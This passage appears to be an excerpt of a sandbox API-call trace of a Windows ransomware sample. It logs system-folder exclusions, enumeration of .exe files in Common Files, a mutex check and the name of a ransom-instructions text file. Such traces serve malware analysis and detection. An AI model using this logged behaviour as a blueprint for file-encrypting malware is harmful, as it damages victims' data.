CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0104.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0104.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0104.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0104.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\", cchLength=0x1e | out: lpsz="c:\\program files\\common files\\") returned 0x1e [0104.226] SHGetMalloc (in: ppMalloc=0x18f44c | out: ppMalloc=0x18f44c*=0x767666bc) returned 0x0 [0104.226] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f448 | out: ppidl=0x18f448) returned 0x0 [0104.227] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.228] SysReAllocStringLen (in: pbstr=0x18f4d0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.228] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.228] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.228] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.228] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.228] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.228] GlobalUnlock (hMem=0x45000c) returned 0 [0104.228] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.228] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.228] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.228] GlobalUnlock (hMem=0x45000c) returned 0 [0104.228] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.228] GlobalUnlock (hMem=0x450004) returned 0 [0104.228] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587da0 [0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0104.229] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15e5ff70, ftCreationTime.dwHighDateTime=0x1d55fbd, ftLastAccessTime.dwLowDateTime=0x2d722770, ftLastAccessTime.dwHighDateTime=0x1d5af2e, ftLastWriteTime.dwLowDateTime=0x2d722770, ftLastWriteTime.dwHighDateTime=0x1d5af2e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashfxp.exe", cAlternateFileName="")) returned 1 [0104.229] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0104.246] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.246] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.246] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.246] GlobalUnlock (hMem=0x450004) returned 0 [0104.246] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.246] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.246] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.246] GlobalUnlock (hMem=0x450004) returned 0 [0104.246] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.246] GlobalUnlock (hMem=0x45000c) returned 0 [0104.246] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.247] CharLowerBuffW (in: lpsz="flashfxp.exe", cchLength=0xc | out: lpsz="flashfxp.exe") returned 0xc [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e3e4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\flashfxp.exe", cchWideChar=42, lpMultiByteStr=0x18e3c0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\flashfxp.exeò", lpUsedDefaultChar=0x0) returned 42 [0104.247] CharLowerBuffW (in: lpsz=".exe", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18e3e4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exexeò", lpUsedDefaultChar=0x0) returned 4 [0104.248] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0104.248] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e6d0280, ftCreationTime.dwHighDateTime=0x1d56c07, ftLastAccessTime.dwLowDateTime=0x2b030c20, ftLastAccessTime.dwHighDateTime=0x1d59467, ftLastWriteTime.dwLowDateTime=0x2b030c20, ftLastWriteTime.dwHighDateTime=0x1d59467, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="sat_ipod.exe", cAlternateFileName="")) returned 1 [0104.248] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.248] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.248] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.248] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.248] GlobalUnlock (hMem=0x45000c) returned 0 [0104.248] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.248] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.248] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.248] GlobalUnlock (hMem=0x45000c) returned 0 [0104.248] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.248] GlobalUnlock (hMem=0x450004) returned 0 [0104.248] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.249] CharLowerBuffW (in: lpsz="sat_ipod.exe", cchLength=0xc | out: lpsz="sat_ipod.exe") returned 0xc [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_ô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e3dc, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sô\x18", lpUsedDefaultChar=0x0) returned 1 [0104.249] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e3e4, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\sat_ipod.exe", cchWideChar=42, lpMultiByteStr=0x18e3c0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\sat_ipod.exeò", lpUsedDefaultChar=0x0) returned 42 [0104.249] CharLowerBuffW (in: lpsz=".exe", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18e3e4, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exexeò", lpUsedDefaultChar=0x0) returned 4 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0104.250] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0104.250] GetLastError () returned 0x12 [0104.250] FindClose (in: hFindFile=0x587da0 | out: hFindFile=0x587da0) returned 1 [0104.250] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.250] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.250] GlobalUnlock (hMem=0x450004) returned 0 [0104.250] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.250] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.250] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.250] GlobalUnlock (hMem=0x450004) returned 0 [0104.250] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.250] GlobalUnlock (hMem=0x45000c) returned 0 [0104.250] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587da0 [0104.251] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0104.251] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.251] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.251] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.251] GlobalUnlock (hMem=0x45000c) returned 0 [0104.251] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.251] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.251] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.251] GlobalUnlock (hMem=0x45000c) returned 0 [0104.251] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.251] GlobalUnlock (hMem=0x450004) returned 0 [0104.251] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.251] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.251] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.251] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.251] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.252] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0104.252] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.252] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.252] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.253] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.253] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.253] GlobalHandle (pMem=0x58c010) returned 0x45000c 